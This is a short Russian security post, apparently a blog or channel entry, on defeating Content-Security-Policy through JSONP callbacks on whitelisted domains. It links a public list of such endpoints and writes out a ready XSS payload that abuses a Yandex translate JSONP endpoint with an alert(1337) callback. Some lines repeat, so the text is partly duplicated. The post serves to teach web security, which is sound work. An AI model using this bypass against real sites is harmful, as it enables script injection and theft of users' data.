Недавно на ZN:Web Village обсуждались способы обхода Content-Security-Policy, в том числе через использование JSONP колбэков из списка довереных доменов.
И тут в твитторе встретилась неплохая подборка таких коллбеков для самых разных сервисов!
https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt
Разберем на примере. Вот встретили вы такую политику:
А вот и сама презентация https://clck.ru/EsdWb
Любопытно, что во многих случаях сервис всячески ругается ("Only alphabet or number allowed in JSONP "), но это не мешает работе байпаса.
И тут в твитторе встретилась неплохая подборка таких коллбеков для самых разных сервисов!
https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt
Разберем на примере. Вот встретили вы такую политику:
Content-Security-Policy: default-src none; script-src 'unsafe-inline' 'nonce-rhg4nkW7bVP4DzlAfkMrdg==' *.yandex.netА для Яндекса как раз есть пара примерчиков. Итого, наш мега-вектор принимает вид:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>PWNED!
А вот и сама презентация https://clck.ru/EsdWb
Любопытно, что во многих случаях сервис всячески ругается ("Only alphabet or number allowed in JSONP "), но это не мешает работе байпаса.